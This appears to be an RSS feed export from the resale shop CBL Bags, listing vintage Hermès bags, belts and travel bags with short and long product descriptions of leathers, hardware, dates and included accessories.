Hermès Bag https://www.cblbags.com/en/p/hermes-bag-bolide-courchevel-gold/ Mon, 10 Aug 2015 21:47:16 +0000 https://www.cblbags.com/?post_type=product&p=2924 Hermès Bolide in Courchevel Gold leather. A roomy, rigid design to stand by you in both daily and traveling.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bolide Bag in Courchevel leather, the classic Epsom, in Gold color. The features gold hardware, white contrasting saddle stitch, double handle and removable strap band. It closes with zipper and includes tirette, clochette, lock and keys; also dustbag. Lining has two open flat pockets. The bag dates back to year 1995.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-market-bag-canvas-box-calf/ Mon, 10 Aug 2015 19:13:55 +0000 https://www.cblbags.com/?post_type=product&p=2890 Hermès Market Box Calf and H Canvas. A different, two-colored, canvas dominant casual Market style.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
A different, two-colored Hermès Market Bucket Bag made of two materials: dark blue Box Calf leather and ecru H canvas. A tote bucket-shaped bag with drawstring fastening and adjustable shoulder strap. This market features gold hardware, blue saddle stitch, oval base and canvas/box calf lining. It has a lot of room to carry all your daily essentials and more and comes with dustbag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-10/ Mon, 10 Aug 2015 14:59:03 +0000 https://www.cblbags.com/?post_type=product&p=2867 Hermès Market Epsom Green. A casual, easy to wear bag to feel in line with nature.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Super cute Hermès Market Bucket Bag in green Epsom leather. A tote bucket-shaped bag with drawstring fastening and adjustable shoulder strap. This market features gold hardware, green saddle stitch, oval base and suede lining. It has a lot of room to carry all your daily essentials and more. It comes with dustbag. Besides, it is made of one of Hermès’ most popular leathers: the Epsom leather.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-market-bucket-bag-jean/ Mon, 10 Aug 2015 13:43:51 +0000 https://www.cblbags.com/?post_type=product&p=2846 Hermès Market Bag in blue Jean colour and Clémence leather. A roomy, comfortable bag with a precious blue tonailty.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Great Hermès Market Bucket Bag in Blue Jean Clémence leather. A tote bucket-shaped bag with drawstring fastening and adjustable shoulder strap. This market features palladium hardware, white saddle stitch contrasting with Jean colour, oval base and suede lining. It has a lot of room to carry all your daily essentials and more. Besides, it is made of one of Hermès’ reference leathers: the Taurillon Clémence, coming from the baby bull, is a smooth, durable and shape-keeping leather.

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-market-bucket-bag-negro/ Mon, 10 Aug 2015 12:12:54 +0000 https://www.cblbags.com/?post_type=product&p=2824 Hermès Market in black Togo leather. A both relaxed and sober tote bag, ready to go with you in that unpredictable days and nights.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Great Hermès Market Bucket Bag in black Togo leather. A tote bucket-shaped bag with drawstring fastening and adjustable shoulder strap. This market features gold hardware, black saddle stitch, oval base and suede lining. It has a lot of room to carry all your daily essentials and more and comes with dustbag. Besides, it is made of one of Hermès’ reference leathers: the Togo leather.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-9/ Sun, 09 Aug 2015 21:29:53 +0000 https://www.cblbags.com/?post_type=product&p=2787 Hermès Picotin MM Lock Bag in Taurillon Clémence leather Taupe. A different, lasting tote; almost brand new.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The Picotin MM Lock Bag is a laid-back, easy to wear model. Made in Taurillon Clémence leather, “Taupe” grey color, this piece has palladium hardware and reinforced base. The bag is a tote style item, open at its top, with two short handles to carry and an adjustable strap with lock to close the bag. It comes with lock, keys and two dustbags, a big one for your Picotin and a smaller one for the keys. It also has a lace with the “calèche” motif from Hermès.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-piano-bag-lizard-ocean/ Fri, 07 Aug 2015 16:07:44 +0000 https://www.cblbags.com/?post_type=product&p=2745 Hermès Piano in blue "Ocean" lizard skin. A really nice and comfortable bag, perfect to get rid of wallets and purses.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
A great vintage article from Hermès, this Piano model in lizard skin and blue “Ocean” color dates back to the sixties. It has minimal gold hardware and a short strap to be carried by hand. Inner room is perfectly optimized thanks to an extensible accordion-like base. It has two compartments, one of them with a push lock wallet, the second one with two open pockets. This beautiful bag has an external flat pocket as well, fitted to keep documents like travel tickets, for instance. Lining made of lambskin.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-trim-i-toile/ Fri, 07 Aug 2015 15:07:04 +0000 https://www.cblbags.com/?post_type=product&p=2719 Hermès Trim in Courchevel Gold and H canvas. This bag will walk by you in shiny days where you need the smart chic touch.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Trim from first generation in Gold Courchevel leather and ecru H canvas. The bag presents gold hardware. This bag is conceived to be carried on shoulder thanks to an adjustable strap. The bag presents a carabiner that attachs to a ring and works as a clasp. Lining has an open flat pocket and other with zipper close; its partly made of canvas and partly of leather. This bag is a great combination: the casual Gold elegance with the light, spring touch from H canvas.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-trim-ii-box-calf-black/ Fri, 07 Aug 2015 14:04:50 +0000 https://www.cblbags.com/?post_type=product&p=2693 Hermès Trim II Box Calf. The easy elegance pouring out of this comfortable, versatile, black piece of classic history of bags.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Trim second generation in black Box Calf leather and gold hardware. This bag is conceived to be carried on shoulder thanks to an adjustable strap. The bag presents a carabiner that attachs to a ring and works as a clasp. The Trim includes dustbag and a longer strap to be sewed to the bag. Lining has an open flat pocket. This bag is a great model whose skin and color awards it with a versatile sober elegance.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-victoria-ii-35-clemence-natural-brown/ Fri, 07 Aug 2015 11:32:50 +0000 https://www.cblbags.com/?post_type=product&p=2652 Hermès Victoria II 35 in "Natural" brown. A gorgeous model in pristine condition including dustbag. Beautiful color halfway Gold and Caramel tonalities with the smoothness granted by Clémence leather.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Victoria II model in 35 size from Hermès. This handbag is made in superb Taurillon Clémence leather, featuring light brown “Natural” color and palladium hardware. This model presents double handle that allows you to carry it on shoulder and zipper closing with a device to fix the zipper with the lock. The Victoria also comes with tirette, clochette (bell), keys and dustbag. The handbag has plenty of room to store all your daily essentials and lining is covered with clear canvas, containing three open pockets.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-8/ Thu, 06 Aug 2015 21:05:39 +0000 https://www.cblbags.com/?post_type=product&p=2615 Vespa Special Edition TPM Mini. A bag made of crocodile from the Nile skin dating from 1977. A vintage wonder in great condition.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This special edition Hermès Vespa TPM Mini in crocodile matte “Chocolat” brown skin from the Nile presents gold hardware; also a fine strap to carry it on the shoulder or cross body. It has a long, metal piece which inserts into a buttonhole and functions as a clasp. Lining is made in brown calf leather. The bag is in very good condition and dates back to no more less than year 1977.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-40-togo-terre/ Thu, 06 Aug 2015 17:06:24 +0000 https://www.cblbags.com/?post_type=product&p=2547 Hermès Birkin 40 in Togo Terre leather. An outstanding piece which comes with various accessories like dustbag, box and bag raincoat.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Big size model from the most representative handbag in Hermès, the Birkin Bag. This item is made of Togo leather in a beautiful dark brown “Terre”. The bag presents double handle, the double tab clasp along with the three parts flap, both characteristic from this model; and palladium hardware. It comes with many accessories such as dustbag, original box, Hermès lace charm and even a cute raincoat Birkin size for your bag! It also includes tirette, clochette, lock and keys. The base in well reinforced and lining presents two pockets: an open one and a zippered close.

 

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-epsom/ Thu, 06 Aug 2015 15:12:51 +0000 https://www.cblbags.com/?post_type=product&p=2511 Hermès Birkin in Rouge Casaque Epsom leather. One of the impressive red tonalities in Hermès to show off in your Birkin.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Birkin 35 Epsom leather in a wonderful Rouge Casaque red color with gold hardware. This stunning model from 1997 preserves in a good condition. It includes tirette, clochette (bell), lock and keys. The Birkin is a classic model known for its double handle and its three parts flap. The lining presents two pockets: a zippered closing and an open flat.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-birkin-35-togo-gold/ Wed, 05 Aug 2015 18:35:27 +0000 https://www.cblbags.com/?post_type=product&p=2485 Hermès Birkin 35 in beautiful Togo leather Gold with gold hardware. It comes with large and small dustbag. A handbag you cannot miss.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Amazing model Hermès Birkin 35 in Togo leather Gold with gold hardware and white backstitch. This handbag is from year 2006 and preserves in very good condition. It includes everything you could ever wish: tirette, clochette (bell), lock, keys and two dustbags, one for the bag and a smaller one for lock and keys. This is a classic model known for its double handle and its three parts flap. The lining presents two pockets: a zippered closing and an open flat one.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-32-croco-whisky/ Wed, 05 Aug 2015 17:17:48 +0000 https://www.cblbags.com/?post_type=product&p=2448 Hermès Kelly 32 Porosus crocodile skin in whisky color. A dazzling, brilliant color between brown and honey along with the elegance of this iconic model, all in this vintage piece from 1980.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Beautiful Hermès Kelly Bag 32 Porosus Crocodile leather in whisky color with gold hardware from 1980. This item presents the iconic “Kelly style” clasp with two tabs and a straight, one piece flap. The bag has a single handle and includes clochette (bell), tirette, covered lock and keys. It also includes a removable leather strap band in the same color of the bag. Goat lining has three pockets: two open and one with zip closing. It is indeed a wonderful piece.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-35-croco-black/ Wed, 05 Aug 2015 16:34:50 +0000 https://www.cblbags.com/?post_type=product&p=2427 Hermès Kelly 35 in Porosus black croco leather. A proof of Hermès' supreme elegance shaped in a vintage piece dating back to the fifties.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 35 Porosus Crocodile in black leather with gold hardware and black backstitch which dates back to the fifties. This incredibly elegant model presents the iconic “Kelly style” clasp with two tabs and a straight, one piece flap. The bag has a single handle and includes clochette (bell), tirette, covered lock and keys. Lining has three open pockets: a small double one and a big one.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-kelly-35-croco-marron/ Wed, 05 Aug 2015 15:58:13 +0000 https://www.cblbags.com/?post_type=product&p=2399 Hermès Kelly 35 in Porosus brown crocodile leather. A vintage piece from 1962 which includes accessories like dustbag and strap band.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 35 Porosus Crocodile leather in brown with gold hardware which dates from 1962. This item presents the iconic “Kelly style” clasp with two tabs and a straight, one piece flap. The bag has a single handle and includes clochette (bell), tirette, lock and keys. It also includes a removable canvas strap band in the same color of the bag and dustbag. Lining has three pockets: two open and one with zip closing.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Bolso Hermès https://www.cblbags.com/en/p/bag-hermes-kelly-35-croco-bleu/ Wed, 05 Aug 2015 14:46:19 +0000 https://www.cblbags.com/?post_type=product&p=2372 Hermès Kelly 35 in Porosus crocodile leather in Bleu Marin Foncé. A really beautiful color for this piece from 1962 in a really nice condition with removable strap.

La entrada Bolso Hermès se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 35 Porosus Crocodile leather in dark navy blue with gold hardware which dates from 1962. This item presents the iconic “Kelly style” clasp with two tabs and a straight, one piece flap. The bag has a single handle and includes clochette (bell), tirette, lock and keys. It also includes a removable canvas strap band in the same color of the bag. Lining has three pockets: two open and one with zip closing.

La entrada Bolso Hermès se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-6/ Tue, 04 Aug 2015 19:04:42 +0000 https://www.cblbags.com/?post_type=product&p=2323 Hermès Kelly 32 Epsom Beige. An amazing, clear piece that comes with two different removable strap bands and dustbag.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 32 in beige Epsom leather. This clear, laid-back Kelly presents gold hardware and white saddle stitch. It has the typical “Kelly” style clasp with two tabs fastening the flap and a single handle to carry it by hand. It includes tirette, clochette (bell), lock and keys. Also dustbag. The lining has a sole compartment with two open pockets and a big one with zipper close. The bag comes with a fine leather band and a canvas strap band, both to wear the bag cross body.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-5/ Tue, 04 Aug 2015 18:19:05 +0000 https://www.cblbags.com/?post_type=product&p=2297 Hermès Kelly 32 Box Calf in brown. A piece from 1985 with a precious classic color you can wear by hand or cross body, however you wish.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 32 in brown Box Calf leather. This classic superb Kelly presents gold hardware and brown saddle stitch. It has the typical “Kelly” style clasp with two tabs fastening the flap and a single handle to carry it on hand. It includes tirette, clochette (bell), lock and keys. The lining has a sole compartment with two open pockets and a big one with zipper close. The bag comes with a narrow strap band to wear it cross body.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-3/ Tue, 04 Aug 2015 15:30:32 +0000 https://www.cblbags.com/?post_type=product&p=2243 Hermès Kelly Bag 32 in black Box Calf. An icon of sobriety and elegance that comes with a fine strap to carry it cross body.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 32 in black Box Calf leather. This wonderful Kelly presents gold hardware and black saddle stitch. It has the typical “Kelly” style clasp with two tabs fastening the flap and a single handle to carry it on hand. It includes tirette, clochette (bell), lock and keys. The lining has a sole compartment  with two open pockets and a big one with zipper close. The bag comes with a narrow strap band to wear it cross body.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag/ Tue, 21 Jul 2015 18:30:56 +0000 https://www.cblbags.com/?post_type=product&p=1892 Hermès Kelly Sport Togo strap bag. A piece from 1991. The key to give a light hearted touch to the super smart Kelly style.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
The most casual Hermès model in “Kelly” line. The bag is made of beige Togo leather and has a narrow strap to wear it crossbody. If features gold hardware, white saddle stitch, Kelly style clasp and two inner pockets: a zipper close and an open one. It comes with dustbag. This item dates back to the early nineties.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Backpack https://www.cblbags.com/en/p/hermes-backpack/ Tue, 21 Jul 2015 11:54:49 +0000 https://www.cblbags.com/?post_type=product&p=1872 Hermès Sac "Kelly à dos" in green Togo leather. A perfect backpack to be ready and comfy while keeping elegance at its best.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
Hermès backpack Sac “Kelly à dos” in dark green Togo leather with palladium hardware. The item features two shoulder straps in green canvas and “Kelly style” clasp and handle in the upper part. Inside presents two pockets: a zipped one and a open one. Includes tirette, clochette, lock and keys. Very good condition.

La entrada Hermès Backpack se publicó primero en CBL Bags.

]]>
Hermès Travel Bag/Bag https://www.cblbags.com/en/p/hermes-travel-bag-bag-herbag/ Thu, 16 Jul 2015 16:30:47 +0000 https://www.cblbags.com/?post_type=product&p=3325 Hermès Herbag. A work of art in manufacture chez Hermès, it can function both as bag and travel bag. In a beautiful H canvas and natural leather combination.

La entrada Hermès Travel Bag/Bag se publicó primero en CBL Bags.

]]>
Travel bag and bag, the Hermès Herbag is the total accessory to carry your belongings. Two identically trimmed bags, one fitting into the other, with exchangeable handles that can be attached to removable frontal flap. A metal bar and leather tabs fix the flap to canvas. The flap is a Kelly style leather piece with a fixed metal piece attached inside. The Herbag is made of H waterproof canvas in ecru color and tanned brown natural leather with palladium hardware.

La entrada Hermès Travel Bag/Bag se publicó primero en CBL Bags.

]]>
Hermès Buckle https://www.cblbags.com/en/p/hermes-buckle-romance-belt-red/ Tue, 14 Jul 2015 15:45:48 +0000 https://www.cblbags.com/?post_type=product&p=3146 Hermès Romance Belt in Red "Casaque" Swift leather. In very good condition and with a wide range of use: turn you silk scarf in whatever you want.

La entrada Hermès Buckle se publicó primero en CBL Bags.

]]>
A really useful and pretty accessory from Hermès, the Romance Belt is thought to work as a buckle and to turn your scarfs into strap belts. This Romance is made in Swift red “Casaque” leather and features palladium hardware with red saddle stitch. The same way, it can be used as clasp for a bracelet or even a tote bag handle.

 

La entrada Hermès Buckle se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-h-buckle-belt-box-calf/ Wed, 08 Jul 2015 07:51:58 +0000 https://www.cblbags.com/?post_type=product&p=3063 Hermès H Belt. A two-sided, two-colored piece from 1982, in Gold and white Box Calf leather.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Vintage H Belt from Hermès, year 1982. This two-sided, two-colored piece is made in Box Calf leather Gold and white. Gold hardware H buckle and five buttonholes to adjust the belt. It is a high-waisted belt, in line with classic style tradition. Although the item shows a start of cracking and signs of wear both in leather and hardware, the belt remains in very good condition regarding it dates back to 1982.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Belt https://www.cblbags.com/en/p/hermes-h-belt-epsom-box-calf/ Wed, 12 Aug 2015 18:40:44 +0000 https://www.cblbags.com/?post_type=product&p=3080 High-waisted H Belt from Hermès. Two-sided piece in Epsom Gold and black Box. Two super smart colors within two outstanding leathers.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Vintage H Belt from Hermès, year 1997. This two-sided, two-colored piece is made in Gold Epsom and black Box Calf leather. Gold hardware H buckle and three buttonholes to adjust the belt. It is a high-waisted belt, in line with classic style tradition. Although the item shows signs of wear both in leather and hardware, the belt remains in good condition.

La entrada Hermès Belt se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-7/ Sat, 20 Jun 2015 16:46:09 +0000 https://www.cblbags.com/?post_type=product&p=2587 Hermès Constance in Porosus crocodile leather Dark Raspberry. A piece from 1976 amazingly well preserved. A vintage jewel.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This authentic Hermès Constance MM 23 in Porosus Crocodile leather and dark raspberry color has gold hardware and introduces itself in a magnificente condition. It dates back to 1976 and it is a pretty special model due to its skin’s exotic nature. The handbag is conceived in simple lines reminding of an equestrian bag. It can be carried cross body or on shoulder thanks to the adjustable strap. This model is well known because of its H clasp which fastens the flap in the frontal down part. Lining presents a zipper close pocket. Porosus crocodile skin is considered one of the most exquisite skins in Hermès because of the sheen, smoothness, and symmetrical pattern it shows which confers this incredible glaze effect.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/hermes-bag-4/ Fri, 05 Jun 2015 17:27:44 +0000 https://www.cblbags.com/?post_type=product&p=2269 Hermès Kelly 32. The supreme elegance of burgundy color and Kelly Bag, all in one vintage piece from 1985.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Kelly Bag 32 in burgundy Box Calf leather. This amazing Kelly presents gold hardware and burgundy saddle stitch. It has the typical “Kelly” style clasp with two tabs fastening the flap and a single handle to carry it on hand. It includes tirette, clochette (bell), lock and keys. Also dustbag. The lining has a sole compartment  with two open pockets and a big one with zipper close. The bag comes with a narrow strap band to wear it cross body.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag https://www.cblbags.com/en/p/hermes-travel-bag-2/ Thu, 23 Jul 2015 18:20:14 +0000 https://www.cblbags.com/?post_type=product&p=2009 Hermès Haut à Courroies. To keep the utmost Birkin elegance while carrying a travel bag.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Travel bag in green military canvas and natural cow leather. The model features “Birkin style” double handle and clasp, palladium hardware, white saddle stitch and leather reinforced base and corners. It comes with tirette, clochette (bell), lock and keys. The bag is supersize Birkin dating from 2009.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag https://www.cblbags.com/en/p/hermes-travel-bag/ Wed, 20 May 2015 14:41:48 +0000 https://www.cblbags.com/?post_type=product&p=1961 Hermès Haut à Courroies in natural leather Cap Gold. Dating from the late twenties, early thirties, it si an imperative acquisition for every Hermès collector.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermès Travel Bag Haut à Courroies. This “sac voyage” is the Birkin “big (and elder) brother”. It is made of natural skin in Cap Gold color and presents the classic Birkin three-parts flap and clasp. This excellent piece features golden brass hardware, double handle and white saddle stitch. This Haut à Courroies is an outstanding article dating from late twenties, early thirties.

La entrada Hermès Travel Bag se publicó primero en CBL Bags.

]]>
Hermes Bag https://www.cblbags.com/en/p/hermes-bag-2/ Wed, 20 May 2015 11:02:00 +0000 https://www.cblbags.com/?post_type=product&p=1913 Hermès Drag in Gold Courchevel and H ecru canvas. Light and smart, it will fit you in different seasons. A vintage collector piece.

La entrada Hermes Bag se publicó primero en CBL Bags.

]]>
Hermès model in Courchevel Gold and ecru H canvas. It features gold hardware, two short handles and leather trim in Courchevel. The bag closes with a double H fitting clasp and has lambskin lining presenting two inner open pockets. A piece with a well-crafted, compact shape. Authentic vintage dating back to the eighties.

La entrada Hermes Bag se publicó primero en CBL Bags.

]]>
Hermès Bag https://www.cblbags.com/en/p/bolso-hermes/ Tue, 19 May 2015 16:35:38 +0000 https://www.cblbags.com/?post_type=product&p=1094 Hermès Evelyne grainy calf Gold with removable strap. A practical, sober and really easy-to-wear model, always keeping up Hermès' level. The key to your casual outfits.

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>
This magnificent piece in grainy calf leather Gold is a perfect Hermès model to show off in casual positions and with a wide range of outfits. The bag features gold hardware, a removable strap, closes with a push lock in the back part of the item and and has the Hermès H punched in the centre of the front side. The bag has been to the SPA (meaning restored).

La entrada Hermès Bag se publicó primero en CBL Bags.

]]>